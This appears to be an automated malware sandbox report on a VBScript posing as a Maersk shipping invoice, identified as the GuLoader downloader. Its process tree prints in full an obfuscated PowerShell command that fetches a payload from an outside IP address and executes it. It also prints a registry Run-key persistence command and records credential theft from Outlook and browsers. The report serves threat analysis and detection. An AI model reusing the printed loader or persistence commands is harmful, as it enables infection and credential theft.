Overview

overview

10

Static

static

1

Maersk_BL_...st.vbs

windows7-x64

10

Maersk_BL_...st.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    136s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-07-2024 10:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Maersk_BL_Invoice_Packinglist.vbs

  • Size

    21KB

  • MD5

    1a705e08ebbfa361df84f04cb5f0976e

  • SHA1

    e3091fec2ae95f28824fec928defaa68e63e189f

  • SHA256

    c506ac9a87485ac16f09afa8f732f7a72699c6f5db222cb347cf8291f5c27d0f

  • SHA512

    bd6b937c3ad2805cac2eb18c1011634e8b50a5bdd9f7af1bec7251429a7cac5214e33003a3da9e9d198fa362461a15b7d3a937ca6ee323ca20b1d6b22128958e

  • SSDEEP

    384:mlzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgwwgvNRqeGb3OS:ezSR022X/523S0e8xPPmZMhb

Score
10/10
guloadercollectiondownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: MapViewOfSection 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Maersk_BL_Invoice_Packinglist.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1384
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Jetjager196 Valrs Splodgy Turer Buttoners Hymeniumnia55 Pseudoethically Mediers131 Hangnests Caprimulgus Indhaling Sjlelivet Psychoclinic perioderne fikey tiaarsdag Oppositionless Rigellaasene Tronprtendenters Vivifier Ggeskals Poner Unaturlighed crinites Jetjager196 Valrs Splodgy Turer Buttoners Hymeniumnia55 Pseudoethically Mediers131 Hangnests Caprimulgus Indhaling Sjlelivet Psychoclinic perioderne fikey tiaarsdag Oppositionless Rigellaasene Tronprtendenters Vivifier Ggeskals Poner Unaturlighed crinites';If (${host}.CurrentCulture) {$Cykelstier++;}Function Grovelled($Slick){$schoolchild=$Slick.Length-$Cykelstier;$Afhstet='SUBsTRI';$Afhstet+='ng';For( $Neurocentrum=1;$Neurocentrum -lt $schoolchild;$Neurocentrum+=2){$Jetjager196+=$Slick.$Afhstet.Invoke( $Neurocentrum, $Cykelstier);}$Jetjager196;}function Hovne35($Arbejdsmetode){ .($Appalachian) ($Arbejdsmetode);}$Muddleheadedness204=Grovelled ' MFo zDi.lSl aA/ 5S. 0K U(AWCiFn dDo w sC UN.T. T1 0U.H0P;S WMi nO6.4T;K Hx 6b4.;U Mr v : 1K2 1H.S0I) UG,edcDkCoI/u2D0B1K0r0,1U0R1 F,i r,eFfaoAx./ 1 2T1,.S0c ';$Paquet=Grovelled 'OUBs eFrU-BASgDeunStC ';$Buttoners=Grovelled ' h tGtgp,:a/V/C1H0N3...1.9H5S.S2 3.7C.,4B3 / W r o,n,gLdTo i.nTgFs,1 9m3,.Ap cAxs ';$Deleting=Grovelled ' >T ';$Appalachian=Grovelled 'GiUePxD ';$Dolke234='Mediers131';$Skinnes = Grovelled ',eMc hSos W%.aKp pUdMa.tSaP%,\BT,r,iPcVoDt iSn.en.HI nStF ,&P&S Me c h oJ BtR ';Hovne35 (Grovelled 'E$SgOl o bCaGl : DbaAn sGe.d e,s =D(AcFm dP /GcL .$MSHkCi n.n e.s ), ');Hovne35 (Grovelled 'i$Og l oBb a,lA:,T u r,eGrR=.$,BUu.tSt.o.n.eFr.s .CsOp l iOtE(T$ D,e.lKe tLiJnUg.)T ');Hovne35 (Grovelled 'I[SNFeFt .ASPeIrFvPi,cCe P,o.iDnpt M a n,aSgSe.rO],: : S.ePc,u,rki t,y PSr.o,t oPcTo.l, I= [SN eUtP..SNeCc.u rPi tHycPTr.oMt oTcOo.l TRy,p,e ]M:.:GTUl s 1R2 ');$Buttoners=$Turer[0];$Semievergreen94= (Grovelled ' $Ug.lPo bEaHlt: F e,rEsvk.vMaPn dDs s.=GNKe w -SOFb j e c t. S.y sCt,eCm .KN.eBt,.PWVeFbOCEl,i,e.nBt');$Semievergreen94+=$Dansedes[1];Hovne35 ($Semievergreen94);Hovne35 (Grovelled ',$RFGe.r s.kBvRa.n d s so.PH e,aRdSeKrBsC[,$FPBa,q u.eItU] =R$TMPuSd,dGl eLhBe aAd.e dSn.eRs sU2L0S4 ');$Haandpanthaver=Grovelled 'T$ F e r.sKk v aLnIdMs,sL.,D o,wPn.l,oPaRd.F i,lRe.(K$PB u.tBt,odn.eHr sD,S$.PBoLnEeOrM) ';$Poner=$Dansedes[0];Hovne35 (Grovelled 's$ gKlUo,b aPl :.CRh,aOf e w,a,xV=F(ST,eSsrt -IP aUtSh. $CPCoTnPeUrA) ');while (!$Chafewax) {Hovne35 (Grovelled ' $Mgul,oFb aRlf:FT,rSi cDh oPp tKeTrEaO1 0P1R=M$ tAr.u,eG ') ;Hovne35 $Haandpanthaver;Hovne35 (Grovelled 'CS,t a rWtH-SSSl,e.eEpN L4 ');Hovne35 (Grovelled 'F$BgDlMo bfaPl :UC hSaAf,eHw aFxS=,(,TAets t.-IP aAtDhR $ P oTn ecr )S ') ;Hovne35 (Grovelled ' $LgLl osbIaTlG:USDp lGo.dNg.y,=A$ g l.o bSaSl :EV,a.lNr s,+L+A%.$FTKujr.eSr . c,o uinRt ') ;$Buttoners=$Turer[$Splodgy];}$skyttegravenes=371185;$Selenographers=25643;Hovne35 (Grovelled ' $ g lSoCbTaDl,: H,acnEg,nGe s,tEsB H=T IGEe t - C.o.n t,e n t D$ P oFnUe r ');Hovne35 (Grovelled '.$Tg,l oKbPa l :.EFn h,a,n,cKe r.sI = ,[US.y.sOtSe,m..SCBoJn v eIr.t,] :A:OFSr oFm BPaSs e 6 4ASjt.rSiPn.gK(S$TH aCnsg,nPeps t s )U ');Hovne35 (Grovelled ' $,g.l,oPb.aPlG:RS jal e lTiGv e.tR .=S S[bSSyUsgtRe.mF.AT eSxDt..MEInsc o d i,nAg,] :F:cADSLCrI I .CGAe.tpSft rLiOnNg,(S$SE.n,h.a n cGeGr.sF). ');Hovne35 (Grovelled ' $FgSlUo b,aIlC:HG lToEb uKsRe rTs = $ SUj l.eKl iHv eRtH.,sju,b,s,t,rCiUnSg,(P$,s.k.y tFtEe gDrDakvRe.nieNsB,M$MS eAl esn oSg,r aCp.hSe rSsC) ');Hovne35 $Globusers;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4816
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tricotine.Int && echo t"
        3⤵
          PID:1660
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Jetjager196 Valrs Splodgy Turer Buttoners Hymeniumnia55 Pseudoethically Mediers131 Hangnests Caprimulgus Indhaling Sjlelivet Psychoclinic perioderne fikey tiaarsdag Oppositionless Rigellaasene Tronprtendenters Vivifier Ggeskals Poner Unaturlighed crinites Jetjager196 Valrs Splodgy Turer Buttoners Hymeniumnia55 Pseudoethically Mediers131 Hangnests Caprimulgus Indhaling Sjlelivet Psychoclinic perioderne fikey tiaarsdag Oppositionless Rigellaasene Tronprtendenters Vivifier Ggeskals Poner Unaturlighed crinites';If (${host}.CurrentCulture) {$Cykelstier++;}Function Grovelled($Slick){$schoolchild=$Slick.Length-$Cykelstier;$Afhstet='SUBsTRI';$Afhstet+='ng';For( $Neurocentrum=1;$Neurocentrum -lt $schoolchild;$Neurocentrum+=2){$Jetjager196+=$Slick.$Afhstet.Invoke( $Neurocentrum, $Cykelstier);}$Jetjager196;}function Hovne35($Arbejdsmetode){ .($Appalachian) ($Arbejdsmetode);}$Muddleheadedness204=Grovelled ' MFo zDi.lSl aA/ 5S. 0K U(AWCiFn dDo w sC UN.T. T1 0U.H0P;S WMi nO6.4T;K Hx 6b4.;U Mr v : 1K2 1H.S0I) UG,edcDkCoI/u2D0B1K0r0,1U0R1 F,i r,eFfaoAx./ 1 2T1,.S0c ';$Paquet=Grovelled 'OUBs eFrU-BASgDeunStC ';$Buttoners=Grovelled ' h tGtgp,:a/V/C1H0N3...1.9H5S.S2 3.7C.,4B3 / W r o,n,gLdTo i.nTgFs,1 9m3,.Ap cAxs ';$Deleting=Grovelled ' >T ';$Appalachian=Grovelled 'GiUePxD ';$Dolke234='Mediers131';$Skinnes = Grovelled ',eMc hSos W%.aKp pUdMa.tSaP%,\BT,r,iPcVoDt iSn.en.HI nStF ,&P&S Me c h oJ BtR ';Hovne35 (Grovelled 'E$SgOl o bCaGl : DbaAn sGe.d e,s =D(AcFm dP /GcL .$MSHkCi n.n e.s ), ');Hovne35 (Grovelled 'i$Og l oBb a,lA:,T u r,eGrR=.$,BUu.tSt.o.n.eFr.s .CsOp l iOtE(T$ D,e.lKe tLiJnUg.)T ');Hovne35 (Grovelled 'I[SNFeFt .ASPeIrFvPi,cCe P,o.iDnpt M a n,aSgSe.rO],: : S.ePc,u,rki t,y PSr.o,t oPcTo.l, I= [SN eUtP..SNeCc.u rPi tHycPTr.oMt oTcOo.l TRy,p,e ]M:.:GTUl s 1R2 ');$Buttoners=$Turer[0];$Semievergreen94= (Grovelled ' $Ug.lPo bEaHlt: F e,rEsvk.vMaPn dDs s.=GNKe w -SOFb j e c t. S.y sCt,eCm .KN.eBt,.PWVeFbOCEl,i,e.nBt');$Semievergreen94+=$Dansedes[1];Hovne35 ($Semievergreen94);Hovne35 (Grovelled ',$RFGe.r s.kBvRa.n d s so.PH e,aRdSeKrBsC[,$FPBa,q u.eItU] =R$TMPuSd,dGl eLhBe aAd.e dSn.eRs sU2L0S4 ');$Haandpanthaver=Grovelled 'T$ F e r.sKk v aLnIdMs,sL.,D o,wPn.l,oPaRd.F i,lRe.(K$PB u.tBt,odn.eHr sD,S$.PBoLnEeOrM) ';$Poner=$Dansedes[0];Hovne35 (Grovelled 's$ gKlUo,b aPl :.CRh,aOf e w,a,xV=F(ST,eSsrt -IP aUtSh. $CPCoTnPeUrA) ');while (!$Chafewax) {Hovne35 (Grovelled ' $Mgul,oFb aRlf:FT,rSi cDh oPp tKeTrEaO1 0P1R=M$ tAr.u,eG ') ;Hovne35 $Haandpanthaver;Hovne35 (Grovelled 'CS,t a rWtH-SSSl,e.eEpN L4 ');Hovne35 (Grovelled 'F$BgDlMo bfaPl :UC hSaAf,eHw aFxS=,(,TAets t.-IP aAtDhR $ P oTn ecr )S ') ;Hovne35 (Grovelled ' $LgLl osbIaTlG:USDp lGo.dNg.y,=A$ g l.o bSaSl :EV,a.lNr s,+L+A%.$FTKujr.eSr . c,o uinRt ') ;$Buttoners=$Turer[$Splodgy];}$skyttegravenes=371185;$Selenographers=25643;Hovne35 (Grovelled ' $ g lSoCbTaDl,: H,acnEg,nGe s,tEsB H=T IGEe t - C.o.n t,e n t D$ P oFnUe r ');Hovne35 (Grovelled '.$Tg,l oKbPa l :.EFn h,a,n,cKe r.sI = ,[US.y.sOtSe,m..SCBoJn v eIr.t,] :A:OFSr oFm BPaSs e 6 4ASjt.rSiPn.gK(S$TH aCnsg,nPeps t s )U ');Hovne35 (Grovelled ' $,g.l,oPb.aPlG:RS jal e lTiGv e.tR .=S S[bSSyUsgtRe.mF.AT eSxDt..MEInsc o d i,nAg,] :F:cADSLCrI I .CGAe.tpSft rLiOnNg,(S$SE.n,h.a n cGeGr.sF). ');Hovne35 (Grovelled ' $FgSlUo b,aIlC:HG lToEb uKsRe rTs = $ SUj l.eKl iHv eRtH.,sju,b,s,t,rCiUnSg,(P$,s.k.y tFtEe gDrDakvRe.nieNsB,M$MS eAl esn oSg,r aCp.hSe rSsC) ');Hovne35 $Globusers;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1404
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tricotine.Int && echo t"
            4⤵
              PID:4036
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Drops file in Program Files directory
              • Modifies registry class
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4428
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Havnefogedeners160" /t REG_EXPAND_SZ /d "%Idelses% -w 1 $Windsorstolene=(Get-ItemProperty -Path 'HKCU:\Fralandsvinds\').Shadflies;%Idelses% ($Windsorstolene)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4472
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Havnefogedeners160" /t REG_EXPAND_SZ /d "%Idelses% -w 1 $Windsorstolene=(Get-ItemProperty -Path 'HKCU:\Fralandsvinds\').Shadflies;%Idelses% ($Windsorstolene)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:812
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\pzwwkzsgsejy"
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:1384
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zbcglrdigmbdilqq"
                5⤵
                  PID:2460
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zbcglrdigmbdilqq"
                  5⤵
                  • Accesses Microsoft Outlook accounts
                  PID:5028
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bwpzmknbuvtikreughs"
                  5⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1016
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\djnjxuaarrhroiitgsfeg"
                  5⤵
                    PID:4472
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\djnjxuaarrhroiitgsfeg"
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1972
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ndacymltfzzwyowxpcsfrdax"
                    5⤵
                    • Accesses Microsoft Outlook accounts
                    PID:3428
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\yxfmyfvvthribctjynehuhmoury"
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2320
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\mbpd.vbs"
                    5⤵
                      PID:2968

            Network

            MITRE ATT&CK Matrix ATT&CK v13

            Initial Access

            Execution

            Persistence

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Privilege Escalation

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Defense Evasion

            Modify Registry

            2
            T1112

            Credential Access

            Discovery

            Query Registry

            1
            T1012

            System Information Discovery

            2
            T1082

            Lateral Movement

            Collection

            Email Collection

            1
            T1114

            Exfiltration

            Command and Control

            Impact

            Resource Development

            Reconnaissance

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ri0vjta4.lbk.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\mbpd.vbs
              Filesize

              346B

              MD5

              66442ccd48f759b031f9b823384e55bc

              SHA1

              b23d081bdc9686e199bcd24aeccd77ccf4550dc6

              SHA256

              8705236d12f3890c431eef683356787b711351e8b302a2cc1fd333ecd8198355

              SHA512

              5fdb17e0e5f520bcaaab6a160655d608f8e5cefe49c6aa221b808d256294ae565e05f3f097c875ed716e8424c4c180418d7216014846d54a44948961169df245

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\pzwwkzsgsejy
              Filesize

              4KB

              MD5

              9c0e2939e93726f02c6d63773936b035

              SHA1

              98538d412084fdec0e31adbc57ccc1d1cbd6ba5b

              SHA256

              55d03b2840cdb4e449d9eebf11828e9220045eb181084c67f71669e5c4221707

              SHA512

              af500eef5d7de38bae6ce75099e7618260dfabba686cc9918064436771b95955a28f208e164cd9c1630b38467bf6f8f3de7173dfd1593a62ec5f500efbe26cb8

              Download Submit
            • C:\Users\Admin\AppData\Roaming\Tricotine.Int
              Filesize

              516KB

              MD5

              a19ac5c628d2cfe0b9f264ef6835a069

              SHA1

              916e42b69efdf9c305a523d39a43dbd0187acb6c

              SHA256

              8cda02eabdc78956055c9b34c2578da73344fbdfa8f65586ed4e90384f85b752

              SHA512

              dc6b71d52a6a164e4e085b0a9457e9512a9bddcf741da2007edc4b3443636bc0ac1a7c6a3445dc1a38b4a26eca99097dec6b7433711f097ff06e8d05321f7b1c

              Download Submit
            • memory/1016-51-0x0000000000400000-0x0000000000424000-memory.dmp
              Filesize

              144KB

              Download
            • memory/1016-52-0x0000000000400000-0x0000000000424000-memory.dmp
              Filesize

              144KB

              Download
            • memory/1016-53-0x0000000000400000-0x0000000000424000-memory.dmp
              Filesize

              144KB

              Download
            • memory/1384-47-0x0000000000400000-0x0000000000478000-memory.dmp
              Filesize

              480KB

              Download
            • memory/1384-48-0x0000000000400000-0x0000000000478000-memory.dmp
              Filesize

              480KB

              Download
            • memory/1384-49-0x0000000000400000-0x0000000000478000-memory.dmp
              Filesize

              480KB

              Download
            • memory/1404-32-0x0000000007760000-0x0000000007DDA000-memory.dmp
              Filesize

              6.5MB

              Download
            • memory/1404-38-0x0000000008940000-0x000000000B3C5000-memory.dmp
              Filesize

              42.5MB

              Download
            • memory/1404-31-0x0000000005F30000-0x0000000005F7C000-memory.dmp
              Filesize

              304KB

              Download
            • memory/1404-15-0x00000000025D0000-0x0000000002606000-memory.dmp
              Filesize

              216KB

              Download
            • memory/1404-33-0x0000000006450000-0x000000000646A000-memory.dmp
              Filesize

              104KB

              Download
            • memory/1404-34-0x00000000071B0000-0x0000000007246000-memory.dmp
              Filesize

              600KB

              Download
            • memory/1404-35-0x0000000007140000-0x0000000007162000-memory.dmp
              Filesize

              136KB

              Download
            • memory/1404-36-0x0000000008390000-0x0000000008934000-memory.dmp
              Filesize

              5.6MB

              Download
            • memory/1404-30-0x0000000005EE0000-0x0000000005EFE000-memory.dmp
              Filesize

              120KB

              Download
            • memory/1404-17-0x0000000005040000-0x0000000005062000-memory.dmp
              Filesize

              136KB

              Download
            • memory/1404-18-0x00000000057E0000-0x0000000005846000-memory.dmp
              Filesize

              408KB

              Download
            • memory/1404-16-0x00000000051B0000-0x00000000057D8000-memory.dmp
              Filesize

              6.2MB

              Download
            • memory/1404-19-0x00000000058C0000-0x0000000005926000-memory.dmp
              Filesize

              408KB

              Download
            • memory/1404-29-0x0000000005930000-0x0000000005C84000-memory.dmp
              Filesize

              3.3MB

              Download
            • memory/4428-65-0x0000000020030000-0x0000000020049000-memory.dmp
              Filesize

              100KB

              Download
            • memory/4428-42-0x0000000001AF0000-0x0000000004575000-memory.dmp
              Filesize

              42.5MB

              Download
            • memory/4428-61-0x0000000020030000-0x0000000020049000-memory.dmp
              Filesize

              100KB

              Download
            • memory/4428-64-0x0000000020030000-0x0000000020049000-memory.dmp
              Filesize

              100KB

              Download
            • memory/4428-94-0x0000000001AF0000-0x0000000004575000-memory.dmp
              Filesize

              42.5MB

              Download
            • memory/4816-12-0x00007FF886670000-0x00007FF887131000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/4816-0-0x00007FF886673000-0x00007FF886675000-memory.dmp
              Filesize

              8KB

              Download
            • memory/4816-11-0x00007FF886670000-0x00007FF887131000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/4816-45-0x00007FF886670000-0x00007FF887131000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/4816-40-0x00007FF886670000-0x00007FF887131000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/4816-1-0x000002965EC30000-0x000002965EC52000-memory.dmp
              Filesize

              136KB

              Download
            • memory/4816-39-0x00007FF886673000-0x00007FF886675000-memory.dmp
              Filesize

              8KB

              Download
            • memory/5028-57-0x0000000000400000-0x0000000000462000-memory.dmp
              Filesize

              392KB

              Download
            • memory/5028-58-0x0000000000400000-0x0000000000462000-memory.dmp
              Filesize

              392KB

              Download
            • memory/5028-50-0x0000000000400000-0x0000000000462000-memory.dmp
              Filesize

              392KB

              Download